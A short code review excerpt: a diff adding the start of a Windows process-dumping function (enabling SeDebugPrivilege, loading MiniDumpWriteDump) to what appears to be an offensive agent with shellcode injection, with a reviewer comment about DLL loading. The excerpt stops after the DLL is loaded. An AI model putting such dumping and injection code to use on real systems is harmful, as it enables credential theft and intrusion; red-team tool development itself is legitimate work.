pkg/agent/exec_windows.go

```diff
@@ -369,4 +372,160 @@ func ExecuteShellcodeQueueUserAPC(shellcode []byte, pid uint32) error {
 
 	return nil
 }
-// TODO always close handle during exception handling
\ No newline at end of file
+
+// TODO always close handle during exception handling
+
+// miniDump will attempt to perform a minidumpwritedump operation on the provided process, and returns the raw bytes of the dumpfile back as an upload to the server. Touches disk during the dump process, however uses the OS default tempfile location
+func miniDump(process string, pid uint32) ([]byte, error) {
+	ret := []byte{}
+
+	//get debug privs (required for dumping processes not owned by current user)
+	err := sePrivEnable("SeDebugPrivilege")
+	if err != nil {
+		return ret, err
+	}
+	/*
+		BOOL MiniDumpWriteDump(
+		  HANDLE                            hProcess,
+		  DWORD                             ProcessId,
+		  HANDLE                            hFile,
+		  MINIDUMP_TYPE                     DumpType,
+		  PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam,
+		  PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
+		  PMINIDUMP_CALLBACK_INFORMATION    CallbackParam
+		);
+	*/
+	//load up our minidump function
+	k32 := syscall.NewLazyDLL("Dbgcore.dll")
```

Comment:
I would prefer to use NewLazySystemDLL. My understanding is this restricts to only using system DLLs. 
Reference: https://github.com/golang/sys/blob/master/windows/dll_windows.go#L242